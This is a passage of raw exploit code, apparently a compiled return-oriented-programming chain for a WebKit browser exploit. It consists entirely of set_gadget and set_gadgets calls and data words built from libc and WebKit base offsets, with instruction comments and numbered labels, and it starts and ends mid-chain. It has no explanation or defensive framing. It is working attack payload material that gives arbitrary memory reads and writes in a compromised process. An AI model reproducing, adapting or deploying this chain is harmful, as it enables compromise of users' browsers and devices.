libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+95528, //L756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L755:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L756:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L757:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+95616, //L759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L759:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+95672, //L760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L760:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+95768, //L763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L762:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L763:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L764:
db([5, 0]); // 0x5
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+95864, //L765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+95880, //L766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L765:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L766:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+95968, //L768
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L768:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+96024, //L769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L769:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+96128, //L771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L771:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L773:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+96248, //L776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+96232, //L774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L774:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L776:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+96392, //L779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+96360, //L777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+96376, //L778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L777:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L778:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L779:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+96464, //L781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L781:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+96520, //L782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L782:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+96616, //L785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L784:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L785:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L786:
db([11, 0]); // 0xb
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+96712, //L787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+96728, //L788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L787:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L788:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+96816, //L790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L790:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+96872, //L791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L791:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+96944, //L794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L794:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+97000, //L795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L795:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L797:
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+97136, //L798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L798:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L800:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+97256, //L803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+97240, //L801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L801:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L803:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+97400, //L806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+97368, //L804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+97384, //L805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L804:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L805:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L806:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+97472, //L808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L808:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+97528, //L809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L809:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+97624, //L812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L811:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L812:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L813:
db([12, 0]); // 0xc
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+97720, //L814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+97736, //L815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L814:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L815:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+97824, //L817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L817:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+97880, //L818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L818:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+97952, //L821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L821:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+98008, //L822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L822:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L824:
libc_base+428453, //mov rax, rdx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+98144, //L825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L825:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L827:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+98264, //L830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+98248, //L828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L828:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L830:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+98408, //L833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+98376, //L831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+98392, //L832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L831:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L832:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L833:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+98480, //L835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L835:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+98536, //L836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L836:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+98632, //L839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L838:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L839:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L840:
db([13, 0]); // 0xd
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+98728, //L841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+98744, //L842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L841:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L842:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+98832, //L844
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L844:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+98888, //L845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L845:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+98960, //L848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L848:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+99016, //L849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L849:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L851:
libc_base+764760, //pop rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+99152, //L852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L852:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L854:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+99272, //L857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+99256, //L855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L855:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L857:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+99416, //L860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+99384, //L858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+99400, //L859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L858:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L859:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L860:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+99488, //L862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L862:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+99544, //L863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L863:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+99640, //L866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L865:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L867:
db([14, 0]); // 0xe
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+99736, //L868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+99752, //L869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L868:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L869:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+99840, //L871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L871:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+99896, //L872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L872:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+99968, //L875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L875:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+100024, //L876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L876:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+100112, //L878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L878:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L880:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+100232, //L883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+100216, //L881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L881:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L883:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+100376, //L886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+100344, //L884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+100360, //L885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L884:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L885:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L886:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+100448, //L888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L888:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+100504, //L889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L889:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+100600, //L892
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L891:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L892:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L893:
db([4, 0]); // 0x4
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+100696, //L894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+100712, //L895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L894:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L895:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+100800, //L897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L897:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+100856, //L898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L898:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+100960, //L900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L900:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L902:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+101080, //L905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+101064, //L903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L903:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L905:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+101224, //L908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+101192, //L906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+101208, //L907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L906:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L907:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L908:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+101296, //L910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L910:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+101352, //L911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L911:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+101448, //L914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
